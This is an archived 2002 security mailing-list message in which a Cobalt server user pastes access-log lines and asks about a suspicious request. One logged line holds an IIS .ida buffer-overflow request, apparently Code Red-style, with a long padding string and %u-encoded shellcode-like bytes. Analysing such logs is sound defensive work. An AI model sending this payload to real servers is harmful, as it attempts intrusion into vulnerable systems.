[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] "GET /default.ida?NNNNNNNN (attack)

Subject: [cobalt-security] "GET /default.ida?NNNNNNNN (attack)
From: "Nicolae" <nicolaep@xxxxxxxxxxxxxxxxxx>
Date: Mon, 11 Mar 2002 18:19:43 -0800
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

Anyone can shed some light on this.  It looks like a WindowZ IIS
type of attempt.


127.0.0.1 - - [10/Mar/2002:19:45:01 -0800] "HEAD / HTTP" 200 0 "-" "-"
64.152.63.110 - - [10/Mar/2002:19:58:16 -0800] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 252 "-" "-"
127.0.0.1 - - [10/Mar/2002:20:00:00 -0800] "HEAD / HTTP" 200 0 "-" "-"
127.0.0.1 - - [10/Mar/2002:20:15:00 -0800] "HEAD / HTTP" 200 0 "-" "-"


Ps. I left the IP listed on purpose.

--
EnigmaBiz.Com

Follow-Ups:
- Re: [cobalt-security] "GET /default.ida?NNNNNNNN (attack)
  - From: cobalt
- Re: [cobalt-security] "GET /default.ida?NNNNNNNN (attack)
  - From: David Garcia Watkins

Prev by Date: [cobalt-security] ipchains & portsentry
Next by Date: Re: [cobalt-security] ipchains & portsentry
Previous by thread: Re: [cobalt-security] Approved AFXR
Next by thread: Re: [cobalt-security] "GET /default.ida?NNNNNNNN (attack)

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index